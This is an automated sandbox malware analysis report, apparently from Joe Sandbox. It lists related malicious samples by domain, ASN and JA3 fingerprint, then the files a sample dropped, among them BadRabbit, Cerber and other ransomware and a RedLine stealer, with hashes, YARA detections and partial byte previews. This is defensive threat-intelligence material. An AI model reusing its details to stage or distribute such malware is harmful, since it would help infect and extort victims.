Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
github.com	4W5dQXszUV.exe	Get hash	malicious	Browse	140.82.121.3
	05dfb699.exe	Get hash	malicious	Browse	140.82.121.4
	a29b4832.exe	Get hash	malicious	Browse	140.82.121.4
	UIvwi4Oprs.jar	Get hash	malicious	Browse	140.82.121.3
	6IXn8C3LvN.exe	Get hash	malicious	Browse	140.82.121.4
	fPMt63h1Bx.exe	Get hash	malicious	Browse	140.82.121.3
	8DjKJy19fW.exe	Get hash	malicious	Browse	140.82.121.4
	X3VTSsbYNU.exe	Get hash	malicious	Browse	140.82.121.3
	4c4Dt7ag0O.exe	Get hash	malicious	Browse	140.82.121.4
	VyyuC2FGJI.exe	Get hash	malicious	Browse	140.82.121.3
	wvzo8Sq723.exe	Get hash	malicious	Browse	140.82.121.4
	SHIPMENT DOCUMENTS#CUSTOMS.PDF.jar	Get hash	malicious	Browse	140.82.121.3
	cosmeticss.jar	Get hash	malicious	Browse	140.82.121.4
	WmWEBNxSDk.exe	Get hash	malicious	Browse	140.82.121.4
	Receipt.jar	Get hash	malicious	Browse	140.82.121.3
	uDNdxuGOJJ.exe	Get hash	malicious	Browse	140.82.121.4
	6tZuVq6gtV.exe	Get hash	malicious	Browse	140.82.121.4
	UDO_Device_Enrolment.exe	Get hash	malicious	Browse	140.82.121.4
	ITSBi3J3ws.exe	Get hash	malicious	Browse	140.82.121.3
	Oya6cSyAWh.exe	Get hash	malicious	Browse	140.82.121.4
raw.githubusercontent.com	4W5dQXszUV.exe	Get hash	malicious	Browse	185.199.110.133
	6IXn8C3LvN.exe	Get hash	malicious	Browse	185.199.108.133
	eIcdS2zpAL.exe	Get hash	malicious	Browse	185.199.108.133
	fPMt63h1Bx.exe	Get hash	malicious	Browse	185.199.108.133
	8DjKJy19fW.exe	Get hash	malicious	Browse	185.199.108.133
	X3VTSsbYNU.exe	Get hash	malicious	Browse	185.199.109.133
	4c4Dt7ag0O.exe	Get hash	malicious	Browse	185.199.108.133
	VyyuC2FGJI.exe	Get hash	malicious	Browse	185.199.109.133
	wvzo8Sq723.exe	Get hash	malicious	Browse	185.199.111.133
	DsWSNwlsAx.exe	Get hash	malicious	Browse	185.199.108.133
	vBw1ZPDusq.exe	Get hash	malicious	Browse	185.199.108.133
	cyDwUwwvmT.exe	Get hash	malicious	Browse	185.199.108.133
	WmWEBNxSDk.exe	Get hash	malicious	Browse	185.199.108.133
	aJ9gvGAVDI.exe	Get hash	malicious	Browse	185.199.108.133
	wm3MFAfjnX.exe	Get hash	malicious	Browse	185.199.111.133
	C9jInbc7L3.exe	Get hash	malicious	Browse	185.199.111.133
	stPAAnO8kG.exe	Get hash	malicious	Browse	185.199.111.133
	5bkyVjvdYi.exe	Get hash	malicious	Browse	185.199.108.133
	66CC00EFEBB6934149A52D1EA39971EE9BCFF170F27C9.exe	Get hash	malicious	Browse	185.199.108.133
	dIHzUz5exM.exe	Get hash	malicious	Browse	185.199.111.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	4W5dQXszUV.exe	Get hash	malicious	Browse	87.98.178.226
	file.exe	Get hash	malicious	Browse	5.135.247.111
	DHL Shipment.exe	Get hash	malicious	Browse	51.89.247.113
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	Acil RFQ_AP65425652_032421,pdf.exe	Get hash	malicious	Browse	5.196.141.86
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f1drv.ms%2fb%2fs%21AgEXU59Lr0q7bVxR8mg7h6yZ8Po&c=E,1,6BM092z77vIG3PL6Rvn5OsmBibuzqty0VRhhs4--J0vr1_SWIej2eVb6OKHk5BHBrSWg3j3ddbq8sU_i3jPZtCxJiobDhg5bgDr6QM_-vutWUBFpbg,,&typo=1	Get hash	malicious	Browse	92.222.139.190
	PAYMENT COPY.exe	Get hash	malicious	Browse	51.75.209.245
	YVw7dMcj8V.exe	Get hash	malicious	Browse	51.89.96.41
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	AjKschI872.elf	Get hash	malicious	Browse	37.187.104.114
	SecuriteInfo.com.Trojan.Siggen18.52433.30846.12558.exe	Get hash	malicious	Browse	158.69.134.53
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	Al Muhaidib Group KSA.Order With our Company Profile.doc.gz.exe	Get hash	malicious	Browse	178.32.107.120
	SecuriteInfo.com.Trojan.PackedNET.1293.15096.13658.exe	Get hash	malicious	Browse	5.196.141.86
	file.exe	Get hash	malicious	Browse	5.135.247.111
	LS5292022.vbs	Get hash	malicious	Browse	37.59.226.102
OVHFR	4W5dQXszUV.exe	Get hash	malicious	Browse	87.98.178.226
	file.exe	Get hash	malicious	Browse	5.135.247.111
	DHL Shipment.exe	Get hash	malicious	Browse	51.89.247.113
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	Acil RFQ_AP65425652_032421,pdf.exe	Get hash	malicious	Browse	5.196.141.86
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f1drv.ms%2fb%2fs%21AgEXU59Lr0q7bVxR8mg7h6yZ8Po&c=E,1,6BM092z77vIG3PL6Rvn5OsmBibuzqty0VRhhs4--J0vr1_SWIej2eVb6OKHk5BHBrSWg3j3ddbq8sU_i3jPZtCxJiobDhg5bgDr6QM_-vutWUBFpbg,,&typo=1	Get hash	malicious	Browse	92.222.139.190
	PAYMENT COPY.exe	Get hash	malicious	Browse	51.75.209.245
	YVw7dMcj8V.exe	Get hash	malicious	Browse	51.89.96.41
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	AjKschI872.elf	Get hash	malicious	Browse	37.187.104.114
	SecuriteInfo.com.Trojan.Siggen18.52433.30846.12558.exe	Get hash	malicious	Browse	158.69.134.53
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	Al Muhaidib Group KSA.Order With our Company Profile.doc.gz.exe	Get hash	malicious	Browse	178.32.107.120
	SecuriteInfo.com.Trojan.PackedNET.1293.15096.13658.exe	Get hash	malicious	Browse	5.196.141.86
	file.exe	Get hash	malicious	Browse	5.135.247.111
	LS5292022.vbs	Get hash	malicious	Browse	37.59.226.102

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	4W5dQXszUV.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	05dfb699.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	a29b4832.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	Invoice-OM Telentia-YX20220926A00224.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	MZA1LR0aPA.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	rEwijnQou9.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	SOA.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	ITEM LIST-0090.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	Kqfcaec.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4
	file.exe	Get hash	malicious	Browse	185.199.108.133 140.82.121.4

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	4W5dQXszUV.exe	Get hash	malicious	Browse
	launcher.exe	Get hash	malicious	Browse
	gHroyjf6yV.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	4W5dQXszUV.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	441899
Entropy (8bit):	7.891913976230692
Encrypted:	false
SSDEEP:	12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
MD5:	FBBDC39AF1139AEBBA4DA004475E8839
SHA1:	DE5C8D858E6E41DA715DCA1C019DF0BFB92D32C0
SHA-256:	630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
SHA-512:	74ECA8C01DE215B33D5CEEA1FDA3F3BEF96B513F58A750DBA04B0DE36F7EF4F7846A6431D52879CA0D8641BFD504D4721A9A96FA2E18C6888FD67FA77686AF87
Malicious:	true
Yara Hits:	Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 93% Antivirus: Metadefender, Detection: 83%, Browse
Joe Sandbox View:	Filename: 4W5dQXszUV.exe, Detection: malicious, Browse Filename: launcher.exe, Detection: malicious, Browse Filename: gHroyjf6yV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2.G2.G2.?..G2.?..G2.....G2.....G2.?..G2.G3.G2...G2...G2.Rich.G2.........................PE..L......Y.................0...................@....@.......................... ............@..................................m..d........p...............4...........................................................@..t............................text............0.................. ..`.rdata..*0...@...2...4..............@..@.data...<............f..............@....rsrc....p.......r...h..............@..@.reloc..N...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	119296
Entropy (8bit):	7.911347099102218
Encrypted:	false
SSDEEP:	3072:pYV/aVHN9ySTn34w33FVTyuGAxsvBLSqAKZqoqrxy031l3y:8adNlltyu3Pa5gr33
MD5:	41789C704A0EECFDD0048B4B4193E752
SHA1:	FB1E8385691FA3293B7CBFB9B2656CF09F20E722
SHA-256:	B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
SHA-512:	76391AC85FDC3BE75441FCD6E19BED08B807D3946C7281C647F16A3BE5388F7BE307E6323FAC8502430A4A6D800D52A88709592A49011ECC89DE4F19102435EA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 86% Antivirus: Metadefender, Detection: 78%, Browse
Joe Sandbox View:	Filename: 4W5dQXszUV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................................................................................................................................................PE..L...)..G.............................d.......p....@..........................................................................t.......p.......................................................f......................................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	320760
Entropy (8bit):	6.315890725389197
Encrypted:	false
SSDEEP:	6144:nl578cxdGY87FohbnmM2i8ito7wTmCbL94KCT3OAmK:nl59zH8MiM2z+NLQBN
MD5:	FE1BC60A95B2C2D77CD5D232296A7FA4
SHA1:	C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684
SHA-256:	B3E1E9D97D74C416C2A30DD11858789AF5554CF2DE62F577C13944A19623777D
SHA-512:	266C541A421878E1E175DB5D94185C991CEC5825A4BC50178F57264F3556080E6FE984ED0380ACF022CE659AA1CA46C9A5E97EFC25FF46CBFD67B9385FD75F89
Malicious:	true
Yara Hits:	Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, Author: pekeinfo
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 91% Antivirus: Metadefender, Detection: 76%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`x...+...+...+B..+...+..u+...+...+...+..+...+...+...+..+...+..+...+Rich...+........PE..L.....sY.....................8....................@.................................{.......................................X...........0...............................................................................0............................text.............................. ..`.rdata...).......*..................@..@.data...............................@....rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	495616
Entropy (8bit):	6.338057450703654
Encrypted:	false
SSDEEP:	6144:lqHKx3YCgy8HmmjJpnVhvLqCO3bLinIz1wASx:lqHoyHNj/nVhvLcyII
MD5:	0A7B70EFBA0AA93D4BC0857B87AC2FCB
SHA1:	01A6C963B2F5F36FF21A1043587DCF921AE5F5CD
SHA-256:	4F5BFF64160044D9A769AB277FF85BA954E2A2E182C6DA4D0672790CF1D48309
SHA-512:	2033F9637B8D023242C93F54C140DD561592A3380A15A9FDC8EBFA33385FF4FC569D66C846A01B4AC005F0521B3C219E87F4B1ED2A83557F9D95FA066AD25E14
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92% Antivirus: Metadefender, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`X............................~.... ... ....@.. ....................... ............`.................................$...W....@.............................. ............................................... ............... ..H............text........ ...................... ..`.sdata..8.... ......................@....rsrc.......@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	216064
Entropy (8bit):	3.1340875869032985
Encrypted:	false
SSDEEP:	1536:YoCFfC303p22fkZrRQpnqjoi7l832fbu9ZXILwVENbM:rCVC303p22sZrRQpnviB832Du9WMON
MD5:	B805DB8F6A84475EF76B795B0D1ED6AE
SHA1:	7711CB4873E58B7ADCF2A2B047B090E78D10C75B
SHA-256:	F5D002BFE80B48386A6C99C41528931B7F5DF736CD34094463C3F85DDE0180BF
SHA-512:	62A2C329B43D186C4C602C5F63EFC8D2657AA956F21184334263E4F6D0204D7C31F86BDA6E85E65E3B99B891C1630D805B70997731C174F6081ECC367CCF9416
Malicious:	true
Yara Hits:	Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, Author: Joe Security Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 85% Antivirus: Metadefender, Detection: 60%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...sWAY.....................d......^.... ... ....@.. ....................................`.....................................W....@..._........................... ............................................... ............... ..H............text...d.... ...................... ..`.sdata..8.... ......................@....rsrc...._...@...`..................@..@.reloc...............J..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54569
Entropy (8bit):	6.640114556707396
Encrypted:	false
SSDEEP:	768:4yKoNLsn4Jp9ZvRInygrpMoZN+WtOl08jxBEHCDwBLpZTPCUvQK:j/sn4/OycxZN+MKxp8t9zQK
MD5:	87CCD6F4EC0E6B706D65550F90B0E3C7
SHA1:	213E6624BFF6064C016B9CDC15D5365823C01F5F
SHA-256:	E79F164CCC75A5D5C032B4C5A96D6AD7604FAFFB28AFE77BC29B9173FA3543E4
SHA-512:	A72403D462E2E2E181DBDABFCC02889F001387943571391BEFED491AAECBA830B0869BDD4D82BCA137BD4061BBBFB692871B1B4622C4A7D9F16792C60999C990
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Metadefender, Detection: 86%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.{.#q..#q..#q..@S?.!q...n...q...UU."q...UP."q..Rich#q..........................PE..L...X\q@.................L...........7.......`....@..................................:......................................db..........pG...........................................................................`..d............................text...(K.......L.................. ..`.rdata..\|....`.......P..............@..@.data....3...p.......`..............@....rsrc...pG.......H...n..............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1427968
Entropy (8bit):	6.856188310924527
Encrypted:	false
SSDEEP:	12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
MD5:	63210F8F1DDE6C40A7F3643CCF0FF313
SHA1:	57EDD72391D710D71BEAD504D44389D0462CCEC9
SHA-256:	2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
SHA-512:	87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 91% Antivirus: Metadefender, Detection: 72%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..\|....`.......T..............@..@.data........P.......6..............@....rsrc....\|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Fantom.exe

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	267776
Entropy (8bit):	7.535290233283343
Encrypted:	false
SSDEEP:	3072:vDKW1LgppLRHMY0TBfJvjcTp5XxG8pt+oSOpE22obq+NYgvPuCEbMBWJxLRiUgV:vDKW1Lgbdl0TBBvjc/M8n35nYgvKjdzi
MD5:	7D80230DF68CCBA871815D68F016C282
SHA1:	E10874C6108A26CEEDFC84F50881824462B5B6B6
SHA-256:	F4234A501EDCD30D3BC15C983692C9450383B73BDD310059405C5E3A43CC730B
SHA-512:	64D02B3E7ED82A64AAAC1F74C34D6B6E6FEAAC665CA9C08911B93EDDCEC66595687024EC576E74EA09A1193ACE3923969C75DE8733859835FEF45335CF265540
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Metadefender, Detection: 66%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................W....PE..L...t..P..........#..........z....../.............@..........................`.......;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\d06ed635\4e9a.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
File Type:	ASCII text, with very long lines (344), with no line terminators
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.892654865294319
Encrypted:	false
SSDEEP:	6:rQ3AzJ1/YR/juoQtqFFihGjc/+sbzPLaMx8XNuigFv1x1:ryAsRaoiqFFihG4Hzx8XNhgFv1x1
MD5:	12F2EF4BB826DDEA525D202587F0FFAD
SHA1:	6B7863178B3DAD686653934B5EA910F709ECDFB2
SHA-256:	F7A8246BF53AF8BFFBCEF692273E63C70869F9001382B09C58462020AD94FBCB
SHA-512:	9CC4C1B46697B52A579ADEACBB1E328495935DDDA013492A5C9C1035407EAA607E8BA20BD52877E6E2A97787E2AA2E823F03466A1E866AF321C1FDFD38A0D024
Malicious:	false
Preview:	XCsCtniYuxeImXjUIN+CxJbDBuczHqL4gf+NlthWpbd4VoIdUsk33Xvbyn+rtR2MwLS7dMDOboRql3tyejlzoStXEHaotMj7E+PZPB2XJ8DFiHQoJTgA8DhcxDSznEOQeRwnc2mWBf5+Q0lG/HQ4FnHwwxLqirnq19jv2XbkS4l49Y2/bkpu7luIX2Kmz2GKmde9qY/WSphPO56fiypg4wqL4Vne0mh1roeiR2Griga7ZCwDD+qFWca8QSuG0NcyDdbsdFg6Xcwen7pT4SWX/cT3Jq8TbOfTfodi48hjTaQ7wg+M9TWHi1jGddQoFTB4/YJGH3Nln6nJ+gGsl8OpDA==

C:\Users\user\AppData\Local\Temp\d06ed635\68f6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
File Type:	b.out separate pure segmented object file V2.3 V3.0 86 Large Text Large Data Huge Objects Enabled
Category:	dropped
Size (bytes):	130
Entropy (8bit):	6.4258380051697275
Encrypted:	false
SSDEEP:	3:Tlp32CzfLxBQvtezbBFvvuIMnPIYjmfkX4ocjXouRXDDP:mCYFsttMPIGXNGoutXP
MD5:	02679D4C284AF99A12D9B094D6ABEA49
SHA1:	AF57AB02DBDBFA3C813F1A8D3ABA4114DC2598EC
SHA-256:	106DB8788633352E1892F0B50D0F91EF83685703C82B2A4CA11974BFDA7967BA
SHA-512:	994DBFD0907909C1E41D4064EA0845E0ACE5A6B963A088ECA29E2D36CA906126CBDAAC906A40C37BC07A0C82B8AD3159C7FC14E6FF085C643C34995C2EED1714
Malicious:	false
Preview:	........RSA1p.......5...>......T....d.9...........J..W...._.;.. #.~.6&m.n...7F......o`...r.!......p:x.'...UA.."R.S_...([..S.

C:\Users\user\Desktop\BadRabbit.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	402632
Entropy (8bit):	7.999545291816681
Encrypted:	true
SSDEEP:	12288:KPd6ZnyRPZJhKymLkH+yDXZEyfMrvDca6:Koy5ZJ7BeeXmb8a6
MD5:	61DA9939DB42E2C3007ECE3F163E2D06
SHA1:	4BD7E9098DE61ADECC1BDBD1A01490994D1905FB
SHA-256:	EA8CCB8B5EC36195AF831001B3CC46CAEDFC61A6194E2568901E7685C57CEEFA
SHA-512:	14D0BC14A10E5BD8022E7AB4A80F98600F84754C2C80E22A8E3D9F9555DDE5BAD056D925576B29FC1A37E73C6EBCA693687B47317A469A7DFDC4AB0F3D97A63E
Malicious:	false
Preview:	PK..........XK.._.$..+.......Endermanch@BadRabbit.exe...IS. ...l.).......m.._.7..FS.yC.h.-o.l...4.7FO.....?.X.>k..Q./+._U.x@...SF..2...!7^F.v=.e..........SV....an. E..af...RK.z_VM..E......,...N......xD{~....t..r......o..4....i_p....S..:2.....(.b..=.7..A...'`.........1......5b..k..j.B.@.N~..r"..:.e#.`.....?`..K.).....ll....NC.!...... ...u`...b..$..SM,.].Z.Po...W,Y6....S.q...{...y..V.C&.][.T7....].l....=..."=$\..!.f.....Rc......fU.......Z.tu.....pJ.\|.....:.m.~....z....7_Z.&<...&7.w.?Q.rq. ..E.k.a.m.`..b.$z.i.w...Gwe.,r.H.rB6..)./[?...O.z....w.~.nO7"O./L.mM.,-.u..${.v85.ff.ob..a..}...:.pBY4f...D.WZ...Hf...62..>...9....._r:QHZhX..0.n..g...[q.9...f...,.WcWLii....N..".....hsuD.....[...^.._..z.!.}m\|..o...L...?54.P.2].$Y.......K z......;Z..F.........]......k....4Ud.$.E.N.d.~...}BD..xg+.g....>.{.U..hkh...&...\...f..7...u1..<.Z....Q.......RF1Y.O~..3.....RM..;bq./D.g.'.y...QRVz.!.\w..!....I.L..y....U.V.!;*..7).0/..5D.M..y.....{....g...Q.%\|.V4,_k]3

C:\Users\user\Desktop\Birele.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	116134
Entropy (8bit):	7.998443688728203
Encrypted:	true
SSDEEP:	3072:KS3AAMRbzhdikdvWC5PWTAiloSQOE8rzl7YP++bA4k5:KgkRbPrdsAizPLy2+b0
MD5:	6CA327B67F1A2B2A4FBB7F342E15E7BF
SHA1:	AAB4A7D8199E8416AD8649FEDE35B846FC96F082
SHA-256:	460A3E3A039C2D0BB2C76017B41403BF3E92727269F49B08778D33108278B58F
SHA-512:	B7A7574CA52885E531ACA71EBE52F7832F8A2436CDA047E7686936FE0337EAE7C4EBCC57DF27C26316871D4167EA4E6794BEB933F7C13EFB0ADDAC0D400E4D9A
Malicious:	false
Preview:	PK...........?...............Endermanch@Birele.exex.Rz..Y.n..].&m\|.f..[...t0"...!..}.[..[z...I...hk.H..B.T...........2dP;)eK.t..i.o....S.Ct_;Y...Y..q..D<....{..b......kI.y#\-..EGm._.p..~M...\...f.`...,..e2p.._X{^..".^..~m......C...2.r$...9>u..&&.....(@.....=..<5.....yUT.W<UDAw..(.+..r.......e.........0.....e,.]b`........_.~./@..6...&...p./-.2Ug...+......H..bZo.M.....^.'m,../..#..7....0.<c.b.Cl.Y.a...#....Z_.g.y.BH...HOY.cw.u.. .4\y...c..i...5.P[oW.1.\|]Il.d\..s...T..%z.h.).....6W.-lGu..!.q5......!....;..m".z.h.>,..s.SF6...........L..Vv....V..C!....^.U4h...A.g@I<......`..r.#.0u..O.,..".4.....N.C.5!..N,).lGy..6.S....Ox__d.........$..0G..^ <u[.& )...!.=............E.m..w0W...)..D....;Bs...".4...o....]...>d..p.L.'..&...{.A..N..n...$,m.h...i.,.lcP.m....NS..L.k"_.Ua.z..!T........S.}....}?b.h.Q#.....D(..%.l.....).I.uZ.R..:Ut..7"....#............7.jN...q5=.=a....\K...&.O......A.J~.....'.D..A..p...).....J_a...t\....."H.... !.W.Y.>.#?...%AO1WkK.....b.1.h.

C:\Users\user\Desktop\Cerber 5.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	185620
Entropy (8bit):	7.999024397332973
Encrypted:	true
SSDEEP:	3072:1rdfCdJA9AZODSf1MIH34E8Ylcg16hK1z0mZiPS6weJ2vbYEzoN:LfuA2D1MIHl8Ylt151z0mZiPSM2vbY7
MD5:	10D74DE972A374BB9B35944901556F5F
SHA1:	593F11E2AA70A1508D5E58EA65BEC0AE04B68D64
SHA-256:	AB9F6AC4A669E6CBD9CFB7F7A53F8D2393CD9753CC1B1F0953F8655D80A4A1DF
SHA-512:	1755BE2BD1E2C9894865492903F9BF03A460FB4C952F84B748268BF050C3ECE4185B612C855804C7600549170742359F694750A46E5148E00B5604ACA5020218
Malicious:	false
